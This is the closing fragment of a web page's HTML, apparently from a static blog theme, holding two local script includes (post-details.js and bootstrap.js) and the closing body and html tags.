<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
